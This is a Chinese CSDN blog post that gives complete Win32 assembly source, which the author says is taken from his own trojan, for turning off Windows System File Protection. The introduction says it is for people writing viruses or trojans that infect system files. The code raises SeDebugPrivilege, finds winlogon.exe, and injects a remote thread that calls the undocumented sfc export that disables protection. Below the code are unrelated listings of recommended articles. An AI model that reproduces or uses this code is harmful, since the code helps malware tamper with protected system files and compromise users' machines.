汇编代码之关闭系统文件保护

最新推荐文章于 2023-10-24 23:24:14 发布
最新推荐文章于 2023-10-24 23:24:14 发布
阅读量4.1k 收藏 1
点赞数
分类专栏: 汇编代码 文章标签: 汇编 include null token thread user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrub/article/details/187934
版权
 对于写一些感染系统文件的病毒或木马时,那个"系统文件保护"好象满让人讨厌的,下面给大家一个关闭系统文件保护汇编例子[摘自我个人所写的"冰马"],希望对和我一样初学win32汇编的新手有点帮助!

[转载请保留出处]

作者:冰狐浪子 [http://www.icyfoxlovelace.com]

代码共分四个部分

关闭系统文件保护例子.asm

    .386
    .model flat, stdcall
    option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include    windows.inc
include    user32.inc
includelib  user32.lib
include    kernel32.inc
includelib  kernel32.lib

include    advapi32.inc
includelib  advapi32.lib

    .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;冰狐浪子作品代码节选
include    关闭文件保护.asm
Fsb  db  "无法关闭文件保护!",0
Fcg  db  "成功关闭文件保护!",0

start:
  call  _Sfcoff    ;关闭文件保护

  .if eax
    invoke  MessageBox,NULL,offset Fcg,offset Fcg,MB_OK
  .else
    invoke  MessageBox,NULL,offset Fsb,offset Fsb,MB_OK
  .endif
ret
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    end  start
提升权限.asm
;提升权限,获得在系统进程中插入代码的权限
;冰狐浪子作品代码节选
;include  advapi32.inc
;includelib  advapi32.lib

SE_DEBUG_NAME_Y  db "SeDebugPrivilege",0

_EnableDebugPrivilege  proc
      local  @hToken
      local  @tp:TOKEN_PRIVILEGES

  invoke  GetCurrentProcess

  lea  ecx,@hToken
  invoke  OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES,ecx  ;addr @hToken

  mov  @tp.PrivilegeCount,1
  invoke  LookupPrivilegeValue,NULL,addr SE_DEBUG_NAME_Y,addr @tp.Privileges[0].Luid
  mov  @tp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLED
  invoke  AdjustTokenPrivileges,@hToken,FALSE,addr @tp,sizeof @tp,NULL,NULL
  push  eax
  invoke  CloseHandle,@hToken
  pop  eax
  ret

_EnableDebugPrivilege  endp
查找进程.asm
;根据程序名,查找进程id
;冰狐浪子作品代码节选
;include  kernel32.inc
;includelib  kernel32.lib
;  例:
;  namePr  db  "EXPLORER.EXE",0
;  ............
;  invoke  _findProcess,offset namePr
;  .if eax
;  找到
;  .else
;  没找到
;  .endif


;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;清零
_ZeroMemory  proc  _lpDest,_dwSize
    
    push  edi
    cld
;push  _lpDest
    mov  edi,_lpDest
    mov  ecx,_dwSize
    xor  eax,eax

    rep  stosb
;pop  eax
    pop  edi
    ret

_ZeroMemory  endp

;计算字符串长度(带尾部的0)
_lstrlen  proc  _lpString
    push  edi
    cld
    mov  edi,_lpString
    mov  ecx,-1
    xor  al,al
    repnz  scasb
    mov  eax,edi
    sub  eax,_lpString
    pop  edi
    ret
_lstrlen  endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;;查找进程id  参数:@ProcessName指向进程名的大写字符串地址
;;eax=返回的id(eax=0表示没找到)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_findProcess  proc  @ProcessName
    local  @StringLength    ;@ProcessName指向的字符串长度
    ;用于获取进程
    local  @hSnapShot
    local  @stProcess:PROCESSENTRY32

;********************************************************************
; 计算传入 进程名 字符串的长度(带尾部的0)
;********************************************************************

    invoke  _lstrlen,@ProcessName
    mov  @StringLength,eax

    invoke  _ZeroMemory,addr @stProcess,sizeof @stProcess
    mov  @stProcess.dwSize,sizeof @stProcess
    invoke  CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
    mov  @hSnapShot,eax

    invoke  Process32First,@hSnapShot,addr @stProcess
    .while  eax
      lea  esi,@stProcess.szExeFile
      push  esi
      mov  edi,esi
;变为大写字母
      _nextz:
      lodsb
      cmp  al,60h
      jc  @F 
      cmp  al,7Bh
      ja  @F
      and  al,not 20h
@@:      STOSB

      cmp  al,"/"
      jnz  @F
      pop  ecx  ;保存的esi出栈,无用
      push  esi
@@:
      or  al,al
      jne  _nextz

      mov  ecx,@StringLength    ;字符串比较
      pop  esi
      mov  edi,@ProcessName
      repz  cmpsb

      .if  ZERO?  ;找到了同名进程(ZF=1)
        mov eax,@stProcess.th32ProcessID
        jmp  @F
      .endif

      invoke  Process32Next,@hSnapShot,addr @stProcess
    .endw
    push eax
    invoke  CloseHandle,@hSnapShot
    pop eax
@@:    ret
_findProcess  endp


关闭文件保护.asm
;冰狐浪子作品代码节选
include    提升权限.asm
include    查找进程.asm

namePr  db  "WINLOGON.EXE",0
sfc_2000  db  'sfc.dll',0
sfc_xp    db  'sfc_os.dll',0

;关闭文件保护
_Sfcoff  proc
  local  @hSfc
    local  @hProcess
    invoke  _EnableDebugPrivilege    ;提升权限
    invoke  _findProcess,offset namePr  ;查找进程
    invoke  OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION,FALSE,eax
;PROCESS_ALL_ACCESS
    .if  eax
      mov  @hProcess,eax    ;进程句柄
      invoke  LoadLibrary,offset sfc_2000
      .if !eax
        invoke  LoadLibrary,offset sfc_xp
      .endif
  mov  @hSfc,eax
      invoke  GetProcAddress,eax,2
  push  eax
  invoke  FreeLibrary,@hSfc
  pop  eax
      .if eax
        xor  ecx,ecx
        invoke  CreateRemoteThread,@hProcess,ecx,ecx,eax,ecx,ecx,ecx
        .if  eax
          invoke  CloseHandle,eax
          jmp @F
        .endif
      .endif
      invoke  CloseHandle,@hProcess    ;关闭进程句柄
    .endif
    xor eax,eax
@@:    ret
_Sfcoff  endp
scrub
关注
专栏目录
使用开源库libyuv中替换开源汇编接口,解决汇编接口中的崩溃问题
dvlinker的技术专栏
08-07 8369
使用开源库libyuv中替换开源汇编接口,解决汇编接口中的崩溃问题
汇编点歌系统含实验报告、源代码、可执行代码.rar
09-03
在这个名为"汇编点歌系统含实验报告、源代码、可执行代码.rar"的压缩包中,包含了一个使用汇编语言编写的点歌系统,以及相关的实验报告、源代码和可执行文件。 汇编语言是一种底层编程语言,它将计算机指令与机器...
emu8086汇编语言操作文件指令详解
qq_70311979的博客
05-15 3214
总结emu8085汇编语言对文件进行打开、关闭、读入和写入,并附有代码示例
Linux内核汇编代码分析
weixin_39247141的博客
07-27 4133
读懂Linux内核汇编代码对理解ARMv8架构和指令集有很大裨益。下面将分析从内核汇编入口到C语言入口start_kernel()函数之间的一大段汇编代码
Win32汇编:常用系统API函数
热门推荐
CSDN
07-05 1万+
熟练掌握Win32 API函数的参数传递,是软件逆向的基础,本章节内容将使用MASM汇编器,逐个编译这些源程序,你可以通过使用一些调试工具,这里推荐OllyDBG来附加编译后的可执行文件,进行逐个分析,观察二进制程序逆向后的一些变化,总结吸收经验,为以后的二进制逆向,漏洞挖掘打基础.
汇编程序--文件操作
Stephan14的专栏
08-02 3571
在介绍文件操作之前,我先介绍一下缓冲区。缓冲区是连续的字节块,用于批量的数据传输。一般缓冲区仅用于暂时存储数据,然后数据被缓冲区中读出并转换成便于程序处理的形式。注意,缓冲区的大小是固定的,由程序员设定的,例如:如果你想要一次读入500字节的数据,可以将500字节未使用的内存位置的地址发送给read系统调用,并将数字500发送给它,这样read调用的就知道数据的大小。在汇编中通过.bss来创建缓冲
linux文件操作(ATT汇编
lindorx的博客
05-14 1657
首先介绍一下linux的shell脚本写法,其实与windows下.bat文件的写法差不多,一行一行的写命令就行了,例如,当我们要用vim打开某个目录(/user/include/printf.h)下的文件,可以这样写: cd /usr/include vim printf.h 保存为run.sh 第一次运行shell脚本时,要先给这个脚本权限,假设脚本名称为“run.sh”,命令为“ch...
Linux系统64位AT&T系统调用汇编指令syscall
qq_42108074的博客
10-24 1371
在Linux中syscall是系统调用)的指令。想要深入了解syscall的作用,就需要了解特权级别。现代计算机通常采用名为的机制来保护整个系统的数据和功能,使其免受故障和外部恶意行为的伤害。这种方式通过提供多种不同层次的资源访问级别,即特权级别,来限制不同代码的执行能力。Intel x86 架构中,特权级别被分为 4 个层次,即Ring0Ring3。其中,Ring0层拥有最高特权,它具有对整个系统的最大控制能力,内核代码通常运行于此。相对地,Ring3。
汇编系列02-借助操作系统输出Hello World
码农无双的博客
03-04 1924
通过汇编在x86-64 CPU上的Linux操作系统系统调用来实现输出hello world这个小例子,详细剖析syscall指令和系统调用是怎么利用寄存器传递参数的。
汇编基本代码与debug的使用
人工智能方向,计算机视觉
07-13 1973
汇编基本代码与debug的使用
Linux中的操作系统实验c++代码及少量的汇编代码.zip
最新发布
04-22
在本资源"Linux中的操作系统实验c++代码及少量的汇编代码.zip"中,我们可以找到一系列与操作系统相关的C++源代码和少量汇编语言代码,这些代码主要用于理解并实践操作系统的基本概念和技术。以下是对其中各个文件...
128X64液晶显示程序汇编代码和hex烧写文件
06-17
总的来说,这个128X64液晶显示程序汇编代码和hex烧写文件包,为开发人员提供了一套完整的解决方案,帮助他们在嵌入式系统中实现LCD显示功能。通过学习和研究这些文件,可以深入了解底层硬件控制和嵌入式系统开发的...
汇编语言中的文件操作.rar_文件_文件 复制_文件操作_汇编 显示文件
09-22
8. **源代码文件**:`KCSJ*.ASM`可能是汇编语言源代码文件,`.ASM`扩展名表示汇编语言源文件。`KCSJ.MAC`可能是宏汇编文件,`.MAC`扩展名有时用于宏汇编语言。 9. **资源文档**:`www.pudn.com.txt`可能是一个包含...
磁盘文件的读写汇编程序源代码资料
06-08
代码资料可能会包含实际的汇编代码示例,演示如何构造这些系统调用,如何管理内存缓冲区,以及如何处理I/O操作的细节。此外,可能还会讨论中断处理、寄存器的使用、段选择子和偏移量的组合以形成有效地址等汇编...
堆栈溢出系列讲座
04-13 2748
 堆栈溢出系列讲座(1-10)  堆栈溢出系列讲座(1)_hacker 教学_黑客技术   本文以及以下同系列各文为ipxodi根据alphe one, Taeho Oh 的英文资料所译及整理,   你可以任意复制和分发。     序言:     通过堆栈溢出来获得root权限是目前使用的相当普遍的一项黑客技术。事实上这是一个   黑客在系统本地已经拥有了一个基本账号后的首选攻击方式。     他
DOS-教学版Boot区病毒
11-10 2511
;引导区病毒样例;制作方法:tasm boot.asm; tlink boot.asm;;生成boot.exe,执行即可.286.model small.code;程序入口参数;ax=内存高端地址 bx=7c00h 引导程序起始地址;cx=0001h 表示从ch(00)磁道cl(01)扇区读出了本程序;dx=00/80h 表示从dx(00:A驱)(80:C驱)读出了本程序;ds=es=ss=cs=
GET TIME OF DAY(获取时间)
11-10 1247
INTRODUCTION The first example is of a program that uses the system time of day. This example uses a conditional assembly to decide between two ways to get the time of day. One way is to use the DOS
汇编语言实现RESET启动和热启动
11-10 1232
汇编语言实现RESET启动和热启动 程序名: RESET.ASM/BOOT.ASM 程序类别: 完整的汇编语言程序 功能: 用程序完成RESET启动和热启动 使用说明: 汇编连接以后转换为com文件运行 程序说明: 在日常用机过程中,如果出现了异常情况常常需要重新启动系统 .对于IBM PC 以及其兼容机,除了开机冷启动外,还有热启动和R ESET开关复位启动,他们的共同特点是转入BIOS的入口
汇编语言程序设计:文件分页显示系统实现
"该资源是武汉理工大学计算机科学与技术专业的一份汇编语言课程设计,旨在设计和...以上知识点涵盖了汇编语言编程、DOS操作系统接口、文件操作、用户界面设计以及文档编写等多个方面,对学生的综合能力有较高的要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值